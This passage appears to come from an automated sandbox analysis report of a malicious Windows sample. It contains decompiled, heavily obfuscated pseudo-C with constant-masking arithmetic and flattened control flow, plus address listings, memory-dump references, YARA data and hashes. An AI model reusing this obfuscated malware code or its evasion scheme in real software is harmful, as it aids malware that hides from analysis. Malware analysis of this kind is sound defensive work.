				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E02AFC237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E02AFE1F8(0x2ae13d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E02AE738A(_v220, _t832, _v380, _v412,  &_v112, E02AFE1F8(0x2ae1318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E02AFFECB(_t832, _v396, _v364, _v404, _v168);
											E02AFFECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E02AE2EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E02AFE1F8(0x2ae1368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0x2ae1368;
													_t844 = E02B016C0(_v276, 0x2ae1368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0x2b06224; // 0x0
														E02AFC9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E02AFFECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E02AEF7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E02AE3431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E02AEBC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E02AFE1F8(0x2ae1368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0x2ae1368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E02AFFECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E02AE51E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E02AFC237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E02B043E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E02AFC2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}




































































































































                                                                                                          0x02af0f90
                                                                                                          0x02af0f92
                                                                                                          0x02af0f99
                                                                                                          0x02af0fa6
                                                                                                          0x02af0fa8
                                                                                                          0x02af0fad
                                                                                                          0x02af0fb4
                                                                                                          0x02af0fbb
                                                                                                          0x02af0fc3
                                                                                                          0x02af0fcb
                                                                                                          0x02af0fd0
                                                                                                          0x02af0fd8
                                                                                                          0x02af0fe0
                                                                                                          0x02af0feb
                                                                                                          0x02af0ff3
                                                                                                          0x02af0ffe
                                                                                                          0x02af1013
                                                                                                          0x02af101a
                                                                                                          0x02af1025
                                                                                                          0x02af1030
                                                                                                          0x02af103b
                                                                                                          0x02af1046
                                                                                                          0x02af1051
                                                                                                          0x02af1059
                                                                                                          0x02af1061
                                                                                                          0x02af1069
                                                                                                          0x02af1074
                                                                                                          0x02af107f
                                                                                                          0x02af108a
                                                                                                          0x02af1095
                                                                                                          0x02af10a2
                                                                                                          0x02af10a5
                                                                                                          0x02af10a9
                                                                                                          0x02af10b6
                                                                                                          0x02af10ba
                                                                                                          0x02af10bf
                                                                                                          0x02af10ca
                                                                                                          0x02af10d5
                                                                                                          0x02af10e0
                                                                                                          0x02af10eb
                                                                                                          0x02af10f6
                                                                                                          0x02af1101
                                                                                                          0x02af110c
                                                                                                          0x02af1117
                                                                                                          0x02af1122
                                                                                                          0x02af1134
                                                                                                          0x02af1139
                                                                                                          0x02af1142
                                                                                                          0x02af114d
                                                                                                          0x02af1160
                                                                                                          0x02af1161
                                                                                                          0x02af1168
                                                                                                          0x02af1173
                                                                                                          0x02af117b
                                                                                                          0x02af1186
                                                                                                          0x02af118a
                                                                                                          0x02af118f
                                                                                                          0x02af119a
                                                                                                          0x02af11a5
                                                                                                          0x02af11b0
                                                                                                          0x02af11bb
                                                                                                          0x02af11ce
                                                                                                          0x02af11d7
                                                                                                          0x02af11e2
                                                                                                          0x02af11ea
                                                                                                          0x02af11f2
                                                                                                          0x02af1201
                                                                                                          0x02af1204
                                                                                                          0x02af1208
                                                                                                          0x02af1210
                                                                                                          0x02af121b
                                                                                                          0x02af122b
                                                                                                          0x02af1232
                                                                                                          0x02af123d
                                                                                                          0x02af1248
                                                                                                          0x02af1253
                                                                                                          0x02af125b
                                                                                                          0x02af1266
                                                                                                          0x02af127c
                                                                                                          0x02af1283
                                                                                                          0x02af128e
                                                                                                          0x02af1299
                                                                                                          0x02af12a4
                                                                                                          0x02af12af
                                                                                                          0x02af12ba
                                                                                                          0x02af12c5
                                                                                                          0x02af12d8
                                                                                                          0x02af12d9
                                                                                                          0x02af12e0
                                                                                                          0x02af12eb
                                                                                                          0x02af12f6
                                                                                                          0x02af12fd
                                                                                                          0x02af1305
                                                                                                          0x02af1310
                                                                                                          0x02af131e
                                                                                                          0x02af1322
                                                                                                          0x02af132f
                                                                                                          0x02af1333
                                                                                                          0x02af133b
                                                                                                          0x02af1346
                                                                                                          0x02af1351
                                                                                                          0x02af1359
                                                                                                          0x02af1364
                                                                                                          0x02af136c
                                                                                                          0x02af1374
                                                                                                          0x02af137c
                                                                                                          0x02af1384
                                                                                                          0x02af138c
                                                                                                          0x02af1394
                                                                                                          0x02af1399
                                                                                                          0x02af13a1
                                                                                                          0x02af13a6
                                                                                                          0x02af13ae
                                                                                                          0x02af13b6
                                                                                                          0x02af13be
                                                                                                          0x02af13c6
                                                                                                          0x02af13cb
                                                                                                          0x02af13d3
                                                                                                          0x02af13de
                                                                                                          0x02af13e9
                                                                                                          0x02af13f4
                                                                                                          0x02af1407
                                                                                                          0x02af140e
                                                                                                          0x02af1419
                                                                                                          0x02af1424
                                                                                                          0x02af142c
                                                                                                          0x02af1434
                                                                                                          0x02af143c
                                                                                                          0x02af1444
                                                                                                          0x02af1454
                                                                                                          0x02af1459
                                                                                                          0x02af1464
                                                                                                          0x02af1467
                                                                                                          0x02af146b
                                                                                                          0x02af1473
                                                                                                          0x02af147b
                                                                                                          0x02af1480
                                                                                                          0x02af1490
                                                                                                          0x02af1494
                                                                                                          0x02af149c
                                                                                                          0x02af14a4
                                                                                                          0x02af14ac
                                                                                                          0x02af14b4
                                                                                                          0x02af14bc
                                                                                                          0x02af14c4
                                                                                                          0x02af14cf
                                                                                                          0x02af14d7
                                                                                                          0x02af14e2
                                                                                                          0x02af14ea
                                                                                                          0x02af14f4
                                                                                                          0x02af14f5
                                                                                                          0x02af14fe
                                                                                                          0x02af1502
                                                                                                          0x02af150a
                                                                                                          0x02af1512
                                                                                                          0x02af151a
                                                                                                          0x02af1522
                                                                                                          0x02af152a
                                                                                                          0x02af1532
                                                                                                          0x02af153d
                                                                                                          0x02af1548
                                                                                                          0x02af1553
                                                                                                          0x02af155e
                                                                                                          0x02af1566
                                                                                                          0x02af156e
                                                                                                          0x02af1576
                                                                                                          0x02af157b
                                                                                                          0x02af1583
                                                                                                          0x02af158b
                                                                                                          0x02af1593
                                                                                                          0x02af159d
                                                                                                          0x02af15a1
                                                                                                          0x02af15a9
                                                                                                          0x02af15b4
                                                                                                          0x02af15ca
                                                                                                          0x02af15d1
                                                                                                          0x02af15dc
                                                                                                          0x02af15e7
                                                                                                          0x02af15ef
                                                                                                          0x02af15fa
                                                                                                          0x02af1605
                                                                                                          0x02af1610
                                                                                                          0x02af1618
                                                                                                          0x02af1623
                                                                                                          0x02af1637
                                                                                                          0x02af1646
                                                                                                          0x02af164d
                                                                                                          0x02af165a
                                                                                                          0x02af166e
                                                                                                          0x02af1673
                                                                                                          0x02af167c
                                                                                                          0x02af1687
                                                                                                          0x02af1692
                                                                                                          0x02af169d
                                                                                                          0x02af16a8
                                                                                                          0x02af16b3
                                                                                                          0x02af16be
                                                                                                          0x02af16c9
                                                                                                          0x02af16d1
                                                                                                          0x02af16d5
                                                                                                          0x02af16dd
                                                                                                          0x02af16e5
                                                                                                          0x02af16ed
                                                                                                          0x02af16f8
                                                                                                          0x02af1703
                                                                                                          0x02af170e
                                                                                                          0x02af1719
                                                                                                          0x02af1720
                                                                                                          0x02af1725
                                                                                                          0x02af172e
                                                                                                          0x02af1739
                                                                                                          0x02af174b
                                                                                                          0x02af1750
                                                                                                          0x02af1759
                                                                                                          0x02af1764
                                                                                                          0x02af176f
                                                                                                          0x02af177a
                                                                                                          0x02af1785
                                                                                                          0x02af1790
                                                                                                          0x02af179b
                                                                                                          0x02af17a3
                                                                                                          0x02af17ae
                                                                                                          0x02af17b9
                                                                                                          0x02af17c1
                                                                                                          0x02af17c9
                                                                                                          0x02af17d4
                                                                                                          0x02af17df
                                                                                                          0x02af17ee
                                                                                                          0x02af17f3
                                                                                                          0x02af17fc
                                                                                                          0x02af1807
                                                                                                          0x02af1812
                                                                                                          0x02af181d
                                                                                                          0x02af1828
                                                                                                          0x02af1833
                                                                                                          0x02af183e
                                                                                                          0x02af1846
                                                                                                          0x02af1851
                                                                                                          0x02af185c
                                                                                                          0x02af1867
                                                                                                          0x02af186f
                                                                                                          0x02af187a
                                                                                                          0x02af1885
                                                                                                          0x02af1890
                                                                                                          0x02af189b
                                                                                                          0x02af18a6
                                                                                                          0x02af18b1
                                                                                                          0x02af18c0
                                                                                                          0x02af18c3
                                                                                                          0x02af18ca
                                                                                                          0x02af18d5
                                                                                                          0x02af18e8
                                                                                                          0x02af18f1
                                                                                                          0x02af18fc
                                                                                                          0x02af190a
                                                                                                          0x02af190f
                                                                                                          0x02af1913
                                                                                                          0x02af1918
                                                                                                          0x02af1920
                                                                                                          0x02af1928
                                                                                                          0x02af1930
                                                                                                          0x02af1938
                                                                                                          0x02af1947
                                                                                                          0x02af194a
                                                                                                          0x02af194e
                                                                                                          0x02af1956
                                                                                                          0x02af1961
                                                                                                          0x02af196c
                                                                                                          0x02af1977
                                                                                                          0x02af198d
                                                                                                          0x02af199f
                                                                                                          0x02af19a6
                                                                                                          0x02af19b1
                                                                                                          0x02af19bc
                                                                                                          0x02af19c7
                                                                                                          0x02af19d2
                                                                                                          0x02af19e4
                                                                                                          0x02af19e9
                                                                                                          0x02af19f2
                                                                                                          0x02af19fd
                                                                                                          0x02af1a08
                                                                                                          0x02af1a13
                                                                                                          0x02af1a1e
                                                                                                          0x02af1a26
                                                                                                          0x02af1a36
                                                                                                          0x02af1a3e
                                                                                                          0x02af1a49
                                                                                                          0x02af1a54
                                                                                                          0x02af1a5f
                                                                                                          0x02af1a6a
                                                                                                          0x02af1a75
                                                                                                          0x02af1a84
                                                                                                          0x02af1a87
                                                                                                          0x02af1a8e
                                                                                                          0x02af1a99
                                                                                                          0x02af1aa1
                                                                                                          0x02af1aa9
                                                                                                          0x02af1aae
                                                                                                          0x02af1ab3
                                                                                                          0x02af1abb
                                                                                                          0x02af1ac8
                                                                                                          0x02af1acc
                                                                                                          0x02af1ad4
                                                                                                          0x02af1adc
                                                                                                          0x02af1ae4
                                                                                                          0x02af1aec
                                                                                                          0x02af1af4
                                                                                                          0x02af1afc
                                                                                                          0x02af1b01
                                                                                                          0x02af1b09
                                                                                                          0x02af1b17
                                                                                                          0x02af1b1e
                                                                                                          0x02af1b23
                                                                                                          0x02af1b2e
                                                                                                          0x02af1b2f
                                                                                                          0x02af1b3a
                                                                                                          0x02af1b3e
                                                                                                          0x02af1b43
                                                                                                          0x02af1b4b
                                                                                                          0x02af1b58
                                                                                                          0x02af1b5c
                                                                                                          0x02af1b61
                                                                                                          0x02af1b69
                                                                                                          0x02af1b71
                                                                                                          0x02af1b84
                                                                                                          0x02af1b93
                                                                                                          0x02af1b9a
                                                                                                          0x02af1ba5
                                                                                                          0x02af1bb0
                                                                                                          0x02af1bb8
                                                                                                          0x02af1bc3
                                                                                                          0x02af1bce
                                                                                                          0x02af1bd9
                                                                                                          0x02af1be4
                                                                                                          0x02af1bf8
                                                                                                          0x02af1bff
                                                                                                          0x02af1c0a
                                                                                                          0x02af1c15
                                                                                                          0x02af1c20
                                                                                                          0x02af1c2b
                                                                                                          0x02af1c36
                                                                                                          0x02af1c41
                                                                                                          0x02af1c4c
                                                                                                          0x02af1c57
                                                                                                          0x02af1c5f
                                                                                                          0x02af1c67
                                                                                                          0x02af1c6f
                                                                                                          0x02af1c74
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c81
                                                                                                          0x02af1c81
                                                                                                          0x02af1c86
                                                                                                          0x02af1c86
                                                                                                          0x02af1c86
                                                                                                          0x02af1c8b
                                                                                                          0x02af1c8b
                                                                                                          0x02af1c8b
                                                                                                          0x02af1c8b
                                                                                                          0x02af1c91
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af1c97
                                                                                                          0x02af1f03
                                                                                                          0x02af1f0a
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c7c
                                                                                                          0x00000000
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c9d
                                                                                                          0x02af1ca3
                                                                                                          0x02af1e0d
                                                                                                          0x02af1e19
                                                                                                          0x02af1e1d
                                                                                                          0x02af1e2b
                                                                                                          0x02af1e3a
                                                                                                          0x02af1e41
                                                                                                          0x02af1e48
                                                                                                          0x02af1e97
                                                                                                          0x02af1ea7
                                                                                                          0x02af1eb6
                                                                                                          0x02af1ed6
                                                                                                          0x02af1edb
                                                                                                          0x02af1ee2
                                                                                                          0x00000000
                                                                                                          0x02af1ca9
                                                                                                          0x02af1caf
                                                                                                          0x02af1dfd
                                                                                                          0x02af1e03
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c7c
                                                                                                          0x00000000
                                                                                                          0x02af1c7c
                                                                                                          0x02af1cb5
                                                                                                          0x02af1cb7
                                                                                                          0x02af1cf7
                                                                                                          0x02af1d03
                                                                                                          0x02af1d0a
                                                                                                          0x02af1d1d
                                                                                                          0x02af1d28
                                                                                                          0x02af1d38
                                                                                                          0x02af1d76
                                                                                                          0x02af1d7b
                                                                                                          0x02af1d7e
                                                                                                          0x02af1d85
                                                                                                          0x02af1dbe
                                                                                                          0x02af1d87
                                                                                                          0x02af1d9f
                                                                                                          0x02af1daf
                                                                                                          0x02af1db4
                                                                                                          0x02af1db7
                                                                                                          0x02af1db7
                                                                                                          0x02af1de1
                                                                                                          0x02af1de6
                                                                                                          0x02af20f6
                                                                                                          0x02af20f6
                                                                                                          0x02af20fb
                                                                                                          0x02af2100
                                                                                                          0x02af2105
                                                                                                          0x00000000
                                                                                                          0x02af1cb9
                                                                                                          0x02af1cbf
                                                                                                          0x02af212e
                                                                                                          0x02af1cc5
                                                                                                          0x02af1cc7
                                                                                                          0x02af1ce3
                                                                                                          0x02af1cea
                                                                                                          0x02af1cf0
                                                                                                          0x02af1cf2
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c81
                                                                                                          0x02af1c86
                                                                                                          0x02af1c86
                                                                                                          0x00000000
                                                                                                          0x02af1c86
                                                                                                          0x02af1cc9
                                                                                                          0x02af1ccf
                                                                                                          0x00000000
                                                                                                          0x02af1cd5
                                                                                                          0x02af1cd5
                                                                                                          0x00000000
                                                                                                          0x02af1cd5
                                                                                                          0x02af1ccf
                                                                                                          0x02af1cc7
                                                                                                          0x02af1cbf
                                                                                                          0x02af1cb7
                                                                                                          0x02af1caf
                                                                                                          0x02af1ca3
                                                                                                          0x02af2137
                                                                                                          0x02af2141
                                                                                                          0x02af2141
                                                                                                          0x02af1f14
                                                                                                          0x02af1f1a
                                                                                                          0x02af204f
                                                                                                          0x02af205b
                                                                                                          0x02af2062
                                                                                                          0x02af20c6
                                                                                                          0x02af20dd
                                                                                                          0x02af20ee
                                                                                                          0x02af20f3
                                                                                                          0x00000000
                                                                                                          0x02af1f20
                                                                                                          0x02af1f20
                                                                                                          0x02af1f22
                                                                                                          0x02af2038
                                                                                                          0x02af203d
                                                                                                          0x02af2045
                                                                                                          0x02af2047
                                                                                                          0x00000000
                                                                                                          0x02af1f28
                                                                                                          0x02af1f28
                                                                                                          0x02af1f2e
                                                                                                          0x02af1ffc
                                                                                                          0x02af2003
                                                                                                          0x02af1c7c
                                                                                                          0x02af1c7c
                                                                                                          0x00000000
                                                                                                          0x02af1c7c
                                                                                                          0x02af1f34
                                                                                                          0x02af1f34
                                                                                                          0x02af1f3a
                                                                                                          0x02af1f86
                                                                                                          0x02af1fb6
                                                                                                          0x02af1fbd
                                                                                                          0x02af1fcc
                                                                                                          0x02af1fce
                                                                                                          0x02af1fd3
                                                                                                          0x02af1fd8
                                                                                                          0x00000000
                                                                                                          0x02af1f3c
                                                                                                          0x02af1f3c
                                                                                                          0x02af1f3e
                                                                                                          0x00000000
                                                                                                          0x02af1f44
                                                                                                          0x02af1f6f
                                                                                                          0x02af1f71
                                                                                                          0x02af1f76
                                                                                                          0x00000000
                                                                                                          0x02af1f76
                                                                                                          0x02af1f3e
                                                                                                          0x02af1f3a
                                                                                                          0x02af1f2e
                                                                                                          0x02af1f22
                                                                                                          0x00000000
                                                                                                          0x02af210a
                                                                                                          0x02af210a
                                                                                                          0x02af210a
                                                                                                          0x00000000
                                                                                                          0x02af2116
                                                                                                          0x02af1c86
                                                                                                          0x02af1c81

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
                                                                                                          • API String ID: 0-421492616
                                                                                                          • Opcode ID: 67c3ec241174300db2716468bdc1c76d4df96dad3b1ae93eefcce761a00cbf3f
                                                                                                          • Instruction ID: f7e6c40dd6447bc0797abbf962dded05e661a88f619cfa38499ed93653b9b401
                                                                                                          • Opcode Fuzzy Hash: 67c3ec241174300db2716468bdc1c76d4df96dad3b1ae93eefcce761a00cbf3f
                                                                                                          • Instruction Fuzzy Hash: 73920171109381CFD379CF61C98AB8BBBE2BBC4704F10891DE69A86260DBB58549CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF2E5D, Relevance: 21.9, Strings: 17, Instructions: 653COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 410 2af2e5d-2af3934 411 2af393f 410->411 412 2af3944-2af394a 411->412 413 2af3be6-2af3be8 412->413 414 2af3950 412->414 417 2af3bee-2af3bf4 413->417 418 2af3ca8-2af3d48 call 2af4244 call 2afe1ac call 2affecb 413->418 415 2af3956-2af395c 414->415 416 2af3ba5-2af3be1 call 2aec5d8 414->416 422 2af3b62-2af3b9b call 2afcca0 call 2aee404 415->422 423 2af3962-2af3968 415->423 416->412 419 2af3c69-2af3c98 call 2aec5d8 417->419 420 2af3bf6-2af3bfc 417->420 442 2af3d4d-2af3d53 418->442 452 2af3c9e 419->452 453 2af3a18-2af3a22 419->453 425 2af3bfe-2af3c04 420->425 426 2af3c20-2af3c5f call 2afcca0 call 2aee404 420->426 422->416 428 2af396e-2af3974 423->428 429 2af3b2d-2af3b5d call 2afc9b0 423->429 433 2af3d5e-2af3d80 call 2b02b09 425->433 434 2af3c0a-2af3c10 425->434 426->419 438 2af397a-2af3980 428->438 439 2af3a96-2af3acf call 2afcca0 428->439 429->411 433->453 434->442 443 2af3c16-2af3c1b 434->443 447 2af3986-2af398c 438->447 448 2af3a23-2af3a85 call 2afe1f8 call 2b031aa call 2affecb 438->448 466 2af3ae8-2af3b28 call 2afcca0 call 2aee404 439->466 467 2af3ad1-2af3ae5 439->467 442->412 456 2af3d59 442->456 443->412 447->442 458 2af3992-2af3a11 call 2af4244 call 2ae3325 call 2affecb 447->458 479 2af3a8a-2af3a91 448->479 452->418 456->433 458->453 466->479 467->466 479->411
                                                                                                          C-Code - Quality: 76%
                                                                                                          			E02AF2E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
